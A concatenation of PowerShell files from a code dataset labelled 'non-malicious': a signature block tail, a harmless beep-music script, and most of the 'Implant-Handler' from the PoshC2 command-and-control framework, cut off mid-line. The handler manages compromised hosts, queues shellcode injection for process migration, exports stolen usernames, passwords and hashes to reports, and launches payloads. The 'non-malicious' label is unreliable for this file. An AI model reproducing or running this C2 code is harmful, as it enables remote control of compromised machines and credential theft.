Tjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB+8vLbDdn5TCVAAEAAAH7MA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0 # MDcyNTE4MzExM1oXDTI1MTAyMjE4MzExM1owgdMxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjU3MUEt # MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqMJWQeWAq4LwvSjYsjP0 # Uvhvm0j0aAOJiMLg0sLfxKoTXAdKD6oMuq5rF5oEiOxV+9ox0H95Q8fhoZq3x9lx # guZyTOK4l2xtcgtJCtjXRllM2bTpjOg35RUrBy0cAloBU9GJBs7LBNrcbH6rBiOv # qDQNicPRZwq16xyjMidU1J1AJuat9yLn7taifoD58blYEcBvkj5dH1la9zU846QD # eOoRO6NcqHLsDx8/zVKZxP30mW6Y7RMsqtB8cGCgGwVVurOnaNLXs31qTRTyVHX8 # ppOdoSihCXeqebgJCRzG8zG/e/k0oaBjFFGl+8uFELwCyh4wK9Z5+azTzfa2GD4p # 6ihtskXs3lnW05UKfDJhAADt6viOc0Rk/c8zOiqzh0lKpf/eWUY2o/hvcDPZNgLa # HvyfDqb8AWaKvO36iRZSXqhSw8SxJo0TCpsbCjmtx0LpHnqbb1UF7cq09kCcfWTD # PcN12pbYLqck0bIIfPKbc7HnrkNQks/mSbVZTnDyT3O8zF9q4DCfWesSr1akycDd # uGxCdKBvgtJh1YxDq1skTweYx5iAWXnB7KMyls3WQZbTubTCLLt8Xn8t+slcKm5D # kvobubmHSriuTA3wTyIy4FxamTKm0VDu9mWds8MtjUSJVwNVVlBXaQ3ZMcVjijyV # oUNVuBY9McwYcIQK62wQ20ECAwEAAaOCAUkwggFFMB0GA1UdDgQWBBRHVSGYUNQ3 # RwOl71zIAuUjIKg1KjAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf # BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww # bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAwzoIKOY2dnUj # fWuMiGoz/ovoc1e86VwWaZNFdgRmOoQuRe4nLdtZONtTHNk3Sj3nkyBszzxSbZEQ # 0DduyKHHI5P8V87jFttGnlR0wPP22FAebbvAbutkMMVQMFzhVBWiWD0VAnu9x0fj # ifLKDAVXLwoun5rCFqwbasXFc7H/0DPiC+DBn3tUxefvcxUCys4+DC3s8CYp7WWX # pZ8Wb/vdBhDliHmB7pWcmsB83uc4/P2GmAI3HMkOEu7fCaSYoQhouWOr07l/KM4T # ndylIirm8f2WwXQcFEzmUvISM6ludUwGlVNfTTJUq2bTDEd3tlDKtV9AUY3rrnFw # HTwJryLtT4IFhvgBfND3mL1eeSakKf7xTII4Jyt15SXhHd5oI/XGjSgykgJrWA57 # rGnAC7ru3/ZbFNCMK/Jj6X8X4L6mBOYa2NGKwH4A37YGDrecJ/qXXWUYvfLYqHGf # 8ThYl12Yg1rwSKpWLolA/B1eqBw4TRcvVY0IvNNi5sm+//HJ9Aw6NJuR/uDR7X7v # DXicpXMlRNgFMyADb8AFIvQPdHqcRpRorY+YUGlvzeJx/2gNYyezAokbrFhACsJ2 # BfyeLyCEo6AuwEHn511PKE8dK4JvlmLSoHj7VFR3NHDk3zRkx0ExkmF8aOdpvoKh # uwBCxoZ/JhbzSzrvZ74GVjKKIyt5FA0wggdxMIIFWaADAgECAhMzAAAAFcXna54C # m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp # Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy # MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51 # yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY # 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9 # cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN # 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua # Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74 # kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2 # K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5 # TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk # i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q # BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri # Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC # BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl # pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB # FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y # eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA # YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU # 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny # bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw # MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp # b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm # ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM # 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW # OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4 # FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw # xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX # fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUABHHn7NCGusZz2RfVbyuwYwPykBWggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOrJT0swIhgPMjAyNDEwMjcyMzQ2MTlaGA8yMDI0MTAyODIzNDYxOVowdzA9 # BgorBgEEAYRZCgQBMS8wLTAKAgUA6slPSwIBADAKAgEAAgINvAIB/zAHAgEAAgIU # vzAKAgUA6sqgywIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAow # CAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQCt9+78tOBk # 3G7InFWNeSnv+gNf7827NofcCXCIrLQa834+WZOE6YjVcA8B4zRZWYQt61ryjsP7 # nO4QK9AT7twzBe+cVhqFCO+umtt9HILo/02fBvZqGhC0aABNMEKKtN5mHLc0RqyR # jYVeyJJgW3o+AuIAomNefMMnMlPFbCzeVx+VWfowu6aZGIf20olcJr1Udx5TxmnY # dsKjQyDDl6Lmtl54TbeWFF6Uai0RRHKqDZXeiYK0nnazQchF9LlhnVpwArQ160lu # nLrYsrAoYdqLC+X0Bz+PmzShMHudHvUpm9HSYaJSjBDw/SBZA3RVy2I0EMGwb608 # ErihFwOktb8UMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAH7y8tsN2flMJUAAQAAAfswDQYJYIZIAWUDBAIBBQCgggFKMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgGe4WHtD9 # TDuFopgGSGLYmlE3TRQat2xI2qYvQkBw7towgfoGCyqGSIb3DQEJEAIvMYHqMIHn # MIHkMIG9BCA52wKr/KCFlVNYiWsCLsB4qhjEYEP3xHqYqDu1SSTlGDCBmDCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB+8vLbDdn5TCVAAEA # AAH7MCIEIOcOJM95z1rtLRPImI9GcCxcLV/lXPRviSc4qDRq2ZeFMA0GCSqGSIb3 # DQEBCwUABIICAEj/R3K3rvqaP5rngyua4ivumX5IexX+L32mUtKyASx/cnP76BBU # tSV312cjOdK7w6ILJkuUzz2VMHRv6zuntWjt7ChhgJEoZfi5UTYGzB2jDFG3kp+h # HqtgYlhKydQaEu86CImDwkOgCQzVtruSb2qiLUR1WM9f/Bp0HpltfKo0e07/3dkP # 0vrwweQuoJuHOViRkEK7vG7S6/9LX16y5gz/bkDAkT0X16dxOo8Z873BJQp9PC+i # 3py0logoyDL13pCcNuTJ8+smEmtG+T9+y/bQMydgHHJRHvFGXu8h+LyC68Kne6Zk # 8EABYIRPsuina5cXbJq8dvqPTdB2vSWJcmet46IuM+4Ja+F2QleBiaN3wkYZnjPj # SrosJtFNZaha4t2J+0cByQmBFbsUUqu5a1TS4X7VpEtyA/sWaKb0U9YVUs44OFeX # aSjbOcWROkxwQbWMeerTuc0yl7T6PtJteInrAjATmuN3cvbIk8km4jLfjRDBwCng # RB1ekZF7KS9kiC5lEJTCSXux/NBAAQeX0fdQQ+Zg5a1rUJAzUQMuNUNps86wtdnj # S381D3zGkvTIqmiSz/QmS3bICJkBh0hMJICMpYXDoHedxX6V6ExYNaVQOP6mc0Qm # V/59KXAesndyZTA7aV2WG0rqwOp1R4A0dXaSV5FDPXVaQmOKJVRQmi+I # SIG # End signature block
combined_dataset/train/non-malicious/1590.ps1
1590.ps1
.{ $one = @((1320,500),(990,250),(1056,250),(1188,250),(1320,125),(1188,125),(1056,250),(990,250),(880,500),(880,250),(1056,250),(1320,500),(1188,250),(1056,250),(990,750),(1056,250),(1188,500),(1320,500),(1056,500),(880,500),(880,500)) $two = @((1188,500),(1408,250),(1760,500),(1584,250),(1408,250),(1320,750),(1056,250),(1320,500),(1188,250),(1056,250),(990,500),(990,250),(1056,250),(1188,500),(1320,500),(1056,500),(880,500),(880,500)) $three = @((660,1000),(528,1000),(594,1000),(495,1000),(528,1000),(440,1000),(419,1000),(495,1000),(660,1000),(528,1000),(594,1000),(495,1000),(528,500),(660,500),(880,1000),(838,2000),(660,1000),(528,1000),(594,1000),(495,1000),(528,1000),(440,1000),(419,1000),(495,1000),(660,1000),(528,1000),(594,1000),(495,1000),(528,500),(660,500),(880,1000),(838,2000)) [Console]::Beep(658,125) foreach ($N in $one) { [Console]::Beep($N[0],$N[1]) } Sleep -M 250 foreach ($N in $two) { [Console]::Beep($N[0],$N[1]) } Sleep -M 500 foreach ($N in $one) { [Console]::Beep($N[0],$N[1]) } Sleep -M 250 foreach ($N in $two) { [Console]::Beep($N[0],$N[1]) } Sleep -M 500 foreach ($N in $three) { [Console]::Beep($N[0],$N[1]) } } .{ $mario = @((130,100),(262,100),(330,100),(392,100),(523,100),(660,100),(784,300),(660,300),(146,100),(262,100),(311,100),(415,100),(523,100),(622,100),(831,300),(622,300),(155,100),(294,100),(349,100),(466,100),(588,100),(699,100),(933,300),(933,100),(933,100),(933,100),(1047,400)) foreach ($N in $mario) { [Console]::Beep($N[0],$N[1]) } } .{ while (1) { 1..2 | % { [console]::beep(3900, 225) } Start-Sleep -Milliseconds 450 } }
combined_dataset/train/non-malicious/4288.ps1
4288.ps1
function Implant-Handler { [CmdletBinding(DefaultParameterSetName = "FolderPath")] Param ( [Parameter(ParameterSetName = "FolderPath", Mandatory = $false)] [string] $FolderPath, [string] $PoshPath ) if (!$FolderPath) { $FolderPath = Read-Host -Prompt `n'Enter the root folder path of the Database/Project' } $Database = "$FolderPath\PowershellC2.SQLite" $p = $env:PsModulePath $p += ";$PoshPath\" $global:randomuri = $null $global:cmdlineinput = 'PS >' $global:implants = $null $global:implantid = $null $global:command = $null $global:newdir = $FolderPath [Environment]::SetEnvironmentVariable("PSModulePath",$p) Import-Module -Name PSSQLite Import-Module "$PoshPath\Modules\ConvertTo-Shellcode.ps1" Import-Module "$PoshPath\C2-Payloads.ps1" $c2serverresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject $defaultbeacon = $c2serverresults.DefaultSleep $killdatefm = $c2serverresults.KillDate $IPAddress = $c2serverresults.HostnameIP $DomainFrontHeader = $c2serverresults.DomainFrontHeader $ipv4address = $c2serverresults.HostnameIP $serverport = $c2serverresults.ServerPort $URLS = $c2serverresults.URLS $EncKey = $c2serverresults.EncKey $SocksURLS = $c2serverresults.SocksURLS $Insecure = $c2serverresults.Insecure $useragent = $c2serverresults.UserAgent $Referer = $c2serverresults.Referer $urlstring = $URLS $newImplant = $urlstring -split "," $newImplantURL = $newImplant[0] -replace '"','' $Host.ui.RawUI.WindowTitle = "PoshC2 Implant Handler: $ipv4address Port $serverport" $head = ' <style> body { font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; } table { table-layout: fixed; word-wrap: break-word; display: table; font-family: monospace; white-space: pre; margin: 1em 0; } th, td { text-align: left; padding: 8px; } tr:nth-child(even){background-color: th { background-color: color: white; } p { margin-left: 20px; font-size: 12px; } </style>' $header = ' <pre> __________ .__. _________ ________ \_______ \____ _____| |__ \_ ___ \ \_____ \ | ___/ _ \/ ___/ | \ / \ \/ / ____/ | | ( <_> )___ \| Y \ \ \____/ \ |____| \____/____ >___| / \______ /\_______ \ \/ \/ \/ \/ ================== www.PoshC2.co.uk ================ ==================================================== </pre>' function startup { Clear-Host $global:implants = $null $global:command = $null $global:randomuri = $null $global:implantid = $null $dbresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants WHERE Alive='Yes'" -As PSObject $global:implants = $dbresults.RandomURI while ($global:randomuri -eq $null) { Clear-Host Write-Host -Object ".___. .__. __ " -ForegroundColor Green Write-Host -Object "| | _____ ______ | | _____ _____/ |_ ______" -ForegroundColor Green Write-Host -Object "| |/ \\____ \| | \__ \ / \ __\/ ___/" -ForegroundColor Green Write-Host -Object "| | Y Y \ |_> > |__/ __ \| | \ | \___ \ " -ForegroundColor Green Write-Host -Object "|___|__|_| / __/|____(____ /___| /__| /____ >" -ForegroundColor Green Write-Host -Object " \/|__| \/ \/ \/ " -ForegroundColor Green Write-Host "============== v3.8 www.PoshC2.co.uk =============" -ForegroundColor Green Write-Host "" foreach ($implant in $dbresults) { $pivotimplant = $null $randomurihost = $implant.RandomURI $implantid = $implant.ImplantID $im_arch = $implant.Arch $im_user = $implant.User $im_hostname = $implant.Hostname $im_lastseen = $implant.LastSeen $im_pid = $implant.PID $im_sleep = $implant.Sleep $im_domain = $implant.Domain $pivot = $implant.Pivot if ($pivot -eq "Daisy"){$pivotimplant = " D"} if ($pivot -eq "Proxy"){$pivotimplant = " P"} if ($randomurihost) { if (((get-date).AddMinutes(-10) -gt $implant.LastSeen) -and ((get-date).AddMinutes(-59) -lt $implant.LastSeen)){ Write-Host "[$implantid]: Seen:$im_lastseen | PID:$im_pid | Sleep:$im_sleep | $im_user @ $im_hostname ($im_arch)$($pivotimplant)" -ForegroundColor Yellow } elseif ((get-date).AddMinutes(-59) -gt $implant.LastSeen){ Write-Host "[$implantid]: Seen:$im_lastseen | PID:$im_pid | Sleep:$im_sleep | $im_user @ $im_hostname ($im_arch)$($pivotimplant)" -ForegroundColor Red } else { Write-Host "[$implantid]: Seen:$im_lastseen | PID:$im_pid | Sleep:$im_sleep | $im_user @ $im_hostname ($im_arch)$($pivotimplant)" -ForegroundColor Green } } } if (($HelpOutput) -and ($HelpOutput -eq "PrintMainHelp")){ print-mainhelp $HelpOutput = $Null } if (($HelpOutput) -and ($HelpOutput -ne "PrintMainHelp")){ Write-Host "" Write-Host $HelpOutput -ForegroundColor Green $HelpOutput = $Null } $global:implantid = Read-Host -Prompt `n'Select ImplantID or ALL or Comma Separated List (Enter to refresh):' Write-Host -Object "" if (!$global:implantid) { startup } if ($global:implantid -eq "Help"){ $HelpOutput = "PrintMainHelp" startup } elseif ($global:implantid -eq "?"){ $HelpOutput = "PrintMainHelp" startup } if ($global:implantid.ToLower().StartsWith("createnewpayload")){ $global:implantid | IEX $HelpOutput = "Created New Payloads" } elseif ($global:implantid.ToLower().StartsWith("set-defaultbeacon")) { [int]$Beacon = $global:implantid -replace "set-defaultbeacon ","" $HelpOutput = "DefaultBeacon updated to: $Beacon" Invoke-SqliteQuery -DataSource $Database -Query "UPDATE C2Server SET DefaultSleep='$Beacon'"|Out-Null startup } elseif (($global:implantid -eq "automigrate-frompowershell") -or ($global:implantid -eq "AM")) { if (Test-Path "$FolderPath\payloads\Posh-shellcode_x86.bin"){ $bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x86.bin" -Encoding Byte) $base64 = [System.Convert]::ToBase64String($bytes) $bytes_64 = (Get-Content "$FolderPath\payloads\Posh-shellcode_x64.bin" -Encoding Byte) $base64_64 = [System.Convert]::ToBase64String($bytes_64) $taskn = "LoadModule Inject-Shellcode.ps1" $taskp = "`$Shellcode86 = `"$base64`";`$Shellcode64 = `"$base64_64`"" $taskm = "AutoMigrate" $Query = 'INSERT INTO AutoRuns (Task) VALUES (@Task)' Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{ Task = $taskn } Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{ Task = $taskp } Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{ Task = $taskm } $HelpOutput = "Added automigrate-frompowershell" startup } else { $HelpOutput = "Error cannot find shellcode" startup } } elseif ($global:implantid -eq "L") { $autorunlist = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM AutoRuns" -As PSObject foreach ($i in $autorunlist) { $taskid = $i.TaskID $taskname = $i.Task $HelpOutput += "TaskID: $taskid | Task: $taskname `n" } startup } elseif ($global:implantid -eq "list-autorun") { $autorunlist = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM AutoRuns" -As PSObject foreach ($i in $autorunlist) { $taskid = $i.TaskID $taskname = $i.Task $HelpOutput += "TaskID: $taskid | Task: $taskname `n" } startup } elseif ($global:implantid -eq "nuke-autorun") { Invoke-SqliteQuery -DataSource $Database -Query "Drop Table AutoRuns" $Query = 'CREATE TABLE AutoRuns ( TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE, Task TEXT)' Invoke-SqliteQuery -Query $Query -DataSource $Database startup } elseif ($global:implantid.ToLower().StartsWith("del-autorun")) { $number = $global:implantid.Substring(12) $number = [int]$number if ($number -match '^\d+$'){ Invoke-SqliteQuery -DataSource $Database -Query "DELETE FROM AutoRuns where TaskID='$number'" $autorunlist = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM AutoRuns" -As PSObject foreach ($i in $autorunlist) { $taskid = $i.TaskID $taskname = $i.Task $HelpOutput += "TaskID: $taskid | Task: $taskname" } startup } else { $HelpOutput = "Error not an integer" startup } } elseif ($global:implantid.ToLower().StartsWith("add-autorun")) { $tasker = $global:implantid.Substring(12) write-host "$tasker" -ForegroundColor Cyan $Query = 'INSERT INTO AutoRuns (Task) VALUES (@Task)' Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{ Task = $tasker } $HelpOutput = "Added autorun $tasker" startup } elseif ($global:implantid.ToLower().StartsWith("set-clockworksmsapikey")) { [string]$apikey = $global:implantid -replace "set-clockworksmsapikey ","" $HelpOutput = "APIKey updated to: $apikey" Invoke-SqliteQuery -DataSource $Database -Query "UPDATE C2Server SET APIKEY='$apikey'"|Out-Null startup } elseif ($global:implantid.ToLower().StartsWith("set-clockworksmsnumber")) { [string]$MobileNumber = $global:implantid -replace "set-clockworksmsnumber ","" $HelpOutput = "APIKey updated to: $MobileNumber" Invoke-SqliteQuery -DataSource $Database -Query "UPDATE C2Server SET MobileNumber='$MobileNumber'"|Out-Null startup } elseif ($global:implantid.ToLower().StartsWith("output-to-html")) { $allcreds = Invoke-SqliteQuery -Datasource $Database -Query "SELECT * FROM Creds" -As PSObject $CredsArray = @() foreach ($cred in $allcreds) { $CredLog = New-object PSObject | Select CredsID, Username, Password, Hash $CredLog.CredsID = $cred.CredsID; $Credlog.Username = $cred.Username; $CredLog.Password = $cred.Password; $CredLog.Hash = $cred.Hash; $CredsArray += $CredLog } $CredsArray | ConvertTo-Html -title "<title>Credential List from PoshC2</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\Creds.html" $allresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants" -As PSObject $ImplantsArray = @() foreach ($implantres in $allresults) { $ImplantLog = New-Object PSObject | Select ImplantID, RandomURI, User, Proxy, Hostname, IPAddress, FirstSeen, LastSeen, PID, Arch, Domain, Sleep $ImplantLog.ImplantID = $implantres.ImplantID; $ImplantLog.RandomURI = $implantres.RandomURI; $ImplantLog.User = $implantres.User; $ImplantLog.Hostname = $implantres.Hostname; $ImplantLog.Proxy = $implantres.Proxy; $ImplantLog.IPAddress = $implantres.IPAddress; $ImplantLog.FirstSeen = $implantres.FirstSeen; $ImplantLog.LastSeen = $implantres.LastSeen; $ImplantLog.PID = $implantres.PID; $ImplantLog.Arch = $implantres.Arch; $ImplantLog.Domain = $implantres.Domain; $ImplantLog.Sleep = $implantres.Sleep; $ImplantsArray += $ImplantLog } $ImplantsArray | ConvertTo-Html -title "<title>Implant List from PoshC2</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\Implants.html" $allresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM CompletedTasks" -As PSObject $TasksArray = @() foreach ($task in $allresults) { $ImplantTask = New-Object PSObject | Select TaskID, Timestamp, Hostname, ImplantID, Command, Output $ImplantTask.TaskID = $task.CompletedTaskID; $ImplantTask.Timestamp = $task.TaskID; $ranuri = $task.RandomURI; $Rest = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants WHERE RandomURI='$ranuri'" -As PSObject $ImplantTask.Hostname = $Rest.Hostname $ImplantTask.ImplantID = $Rest.ImplantID; $ImplantTask.Command = $task.Command; $ImplantTask.Output = $task.Output; $TasksArray += $ImplantTask } $TasksArray | ConvertTo-Html -title "<title>Tasks from PoshC2</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\ImplantTasks.html" $allresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject $TasksArray = @() foreach ($task in $allresults) { $C2ServerDetails = New-Object PSObject | Select HostnameIP, DomainFrontHeader, KillDate, ServerPort, DownloadURI, URLS $C2ServerDetails.HostnameIP = $task.HostnameIP; $C2ServerDetails.DomainFrontHeader = $task.DomainFrontHeader; $C2ServerDetails.KillDate = $task.KillDate; $C2ServerDetails.ServerPort = $task.ServerPort; $C2ServerDetails.DownloadURI = $task.DownloadURI; $C2ServerDetails.URLS = $task.URLS; $TasksArray += $C2ServerDetails } $TasksArray | ConvertTo-Html -title "<title>PoshC2 Server</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\C2Server.html" $HelpOutput = "Created four reports in $FolderPath\reports\*" } elseif ($global:implantid -eq "P") { start-process $FolderPath\payloads\payload.bat $HelpOutput = "Pwning self......" $HelpOutput } elseif ($global:implantid.ToLower().StartsWith("pwnself")) { start-process $FolderPath\payloads\payload.bat $HelpOutput = "Pwning self......" $HelpOutput } elseif ($global:implantid.ToLower().StartsWith("history")) { $History = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM History" -As PSObject foreach ($item in $History) { $HelpOutput += $item.Command + "`n" } } elseif ($global:implantid.ToLower().StartsWith("show-serverinfo")) { $item = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject $HelpOutput += "Hostname: $($item.HostnameIP) `n" $HelpOutput += "ServerPort: $($item.ServerPort) `n" $HelpOutput += "EncKey: $($item.EncKey) `n" if ($item.DomainFrontHeader) { $HelpOutput += "DomainFrontHeader: $($item.DomainFrontHeader) `n"} $HelpOutput += "DefaultSleep: $($item.DefaultSleep) `n" $HelpOutput += "KillDate: $($item.KillDate) `n" $HelpOutput += "HTTPResponse: $($item.HTTPResponse) `n" $HelpOutput += "FolderPath: $($item.FolderPath) `n" $HelpOutput += "QuickCommand: $($item.QuickCommand) `n" if ($item.ProxyURL) { $HelpOutput += "ProxyURL: $($item.ProxyURL) `n"} if ($item.ProxyUser) { $HelpOutput += "ProxyUser: 